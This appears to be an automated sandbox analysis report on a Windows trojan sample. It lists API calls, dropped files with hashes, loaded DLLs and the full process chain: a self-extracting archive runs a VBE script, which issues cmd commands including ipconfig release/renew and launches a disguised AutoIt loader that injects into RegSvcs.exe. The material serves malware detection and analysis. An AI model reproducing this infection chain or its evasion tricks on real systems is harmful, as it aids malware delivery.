                Source: Yara match | File source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0042CCE3 NtClose, 14_2_0042CCE3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02B60 NtClose,LdrInitializeThunk, 14_2_01A02B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02DF0 NtQuerySystemInformation,LdrInitializeThunk, 14_2_01A02DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02C70 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_01A02C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A035C0 NtCreateMutant,LdrInitializeThunk, 14_2_01A035C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A04340 NtSetContextThread, 14_2_01A04340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A04650 NtSuspendThread, 14_2_01A04650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02BA0 NtEnumerateValueKey, 14_2_01A02BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02B80 NtQueryInformationFile, 14_2_01A02B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02BE0 NtQueryValueKey, 14_2_01A02BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02BF0 NtAllocateVirtualMemory, 14_2_01A02BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02AB0 NtWaitForSingleObject, 14_2_01A02AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02AF0 NtWriteFile, 14_2_01A02AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02AD0 NtReadFile, 14_2_01A02AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02DB0 NtEnumerateKey, 14_2_01A02DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02DD0 NtDelayExecution, 14_2_01A02DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02D30 NtUnmapViewOfSection, 14_2_01A02D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02D00 NtSetInformationFile, 14_2_01A02D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02D10 NtMapViewOfSection, 14_2_01A02D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02CA0 NtQueryInformationToken, 14_2_01A02CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02CF0 NtOpenProcess, 14_2_01A02CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02CC0 NtQueryVirtualMemory, 14_2_01A02CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02C00 NtQueryInformationProcess, 14_2_01A02C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02C60 NtCreateKey, 14_2_01A02C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02FA0 NtQuerySection, 14_2_01A02FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02FB0 NtResumeThread, 14_2_01A02FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02F90 NtProtectVirtualMemory, 14_2_01A02F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02FE0 NtCreateFile, 14_2_01A02FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02F30 NtCreateSection, 14_2_01A02F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02F60 NtCreateProcessEx, 14_2_01A02F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02EA0 NtAdjustPrivilegesToken, 14_2_01A02EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02E80 NtReadVirtualMemory, 14_2_01A02E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02EE0 NtQueueApcThread, 14_2_01A02EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A02E30 NtWriteVirtualMemory, 14_2_01A02E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A03090 NtSetValueKey, 14_2_01A03090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A03010 NtOpenDirectoryObject,14_2_01A03010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A039B0 NtGetContextThread,14_2_01A039B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A03D10 NtOpenProcessToken,14_2_01A03D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A03D70 NtOpenThread,14_2_01A03D70
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00249B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00249B5C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008B1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,7_2_008B1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008BF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,7_2_008BF122
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0039F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_0039F122
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D38E014_2_019D38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3D80014_2_01A3D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EFB8014_2_019EFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A45BF014_2_01A45BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A0DBF914_2_01A0DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FB7614_2_01A8FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A15AA014_2_01A15AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A71AA314_2_01A71AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6DAAC14_2_01A6DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7DAC614_2_01A7DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A43A6C14_2_01A43A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FA4914_2_01A8FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A87A4614_2_01A87A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EFDC014_2_019EFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A87D7314_2_01A87D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D3D4014_2_019D3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A81D5A14_2_01A81D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FCF214_2_01A8FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A49C3214_2_01A49C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D1F9214_2_019D1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FFB114_2_01A8FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01993FD214_2_01993FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01993FD514_2_01993FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8FF0914_2_01A8FF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D9EB014_2_019D9EB0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_017C6B70
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_017C6B72
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_017C5B60
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_017C5B59
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_0180CFA8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_0180BED8
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_017C7010
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_0180DC18
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_017C52D0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_017C63A0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_0180C761
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_0180C768
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_0180D778
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_3_0180D77A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00358037
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00352007
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0034E0BE
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0033E1A0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0033225D
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0036A28E
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003522C2
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0034C59E
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003BC7A3
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0036E89F
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003A291A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00366AFB
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00398B27
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0035CE30
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00367169
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003C51D2
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00339240
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00339499
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00351724
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00351A96
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00339B60
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00357BAB
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00351D40
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00357DDA
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2.exe 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01A4F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01A3EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01A05130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01A17E54 appears 110 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 019BB970 appears 280 times
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: String function: 002657D8 appears 67 times
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: String function: 00266630 appears 31 times
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: String function: 002657A5 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: String function: 01195111 appears 67 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: String function: 011951A3 appears 36 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: String function: 00874CF3 appears 31 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: String function: 00870DC0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: String function: 0119516F appears 36 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: String function: 0086FD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: String function: 0034FD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: String function: 00350DC0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: String function: 00354CF3 appears 31 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 196
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs FX6KTgnipP.exe
                Source: FX6KTgnipP.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@40/50@0/0
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: 0_2_0024932C GetLastError,FormatMessageW,_wcslen,LocalFree
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008B194F AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008B1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0039194F AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_00391F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008C5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008BDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008D4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: 0_2_0025EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2552:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:336:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3656
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Command line argument: 0T) (0_2_0026454A)
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Command line argument: sfxname (0_2_0026454A)
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Command line argument: sfxstime (0_2_0026454A)
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Command line argument: STARTDLG (0_2_0026454A)
                Source: FX6KTgnipP.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | File read: C:\Windows\win.ini
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: FX6KTgnipP.exe | ReversingLabs: Detection: 71%
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | File read: C:\Users\user\Desktop\FX6KTgnipP.exe
                Source: unknown | Process created: C:\Users\user\Desktop\FX6KTgnipP.exe "C:\Users\user\Desktop\FX6KTgnipP.exe"
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 dmqiuorkt.mp2 tdggoffi.bin
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Process created: C:\Windows\SysWOW64\UserAccountControlSettings.exe "C:\Windows\SysWOW64\UserAccountControlSettings.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 196
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 dmqiuorkt.mp2 tdggoffi.bin
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Process created: C:\Windows\SysWOW64\UserAccountControlSettings.exe "C:\Windows\SysWOW64\UserAccountControlSettings.exe"
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: dxgidebug.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: policymanager.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: msvcp110_win.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\FX6KTgnipP.exe Section loaded: sppc.dll
